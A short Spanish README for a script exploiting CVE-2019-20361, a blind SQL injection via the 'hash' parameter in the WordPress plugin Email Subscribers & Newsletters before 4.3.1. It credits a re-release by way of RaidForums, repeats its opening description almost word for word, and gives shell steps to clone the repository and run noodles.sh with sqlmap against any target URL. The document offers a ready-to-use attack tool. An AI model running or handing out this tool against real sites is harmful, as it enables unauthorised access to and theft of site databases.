
Existía una falla en el plugin de WordPress, Email Subscribers & Newsletters anterior a la versión 4.3.1, que permitía pasar sentencias SQL a la base de datos mediante el parámetro hash (una vulnerabilidad de inyección SQL ciega).
Hubo una falla en el plugin de WordPress, Email Subscribers & Newsletters anterior a la versión 4.3.1, que permitía pasar sentencias SQL a la base de datos en el parámetro hash (una vulnerabilidad de inyección SQL ciega). Este script es una "versión saneada" del script original disponible en exploit-db.com creado por @KBA@SOGETI_ESEC , la versión original fue saneada en RaidForums.com

> $ git clone https://github.com/jerrylewis9/CVE-2019-20361-EXPLOIT.git
> $ cd CVE-2019-20361-EXPLOIT
> $ chmod +x noodles.sh
> $ bash noodles.sh "url"
sqlmap (https://github.com/sqlmapproject/sqlmap)
#El script reconoce sqlmap, no sqlmap.py o similares, así que mueve sqlmap al directorio bin.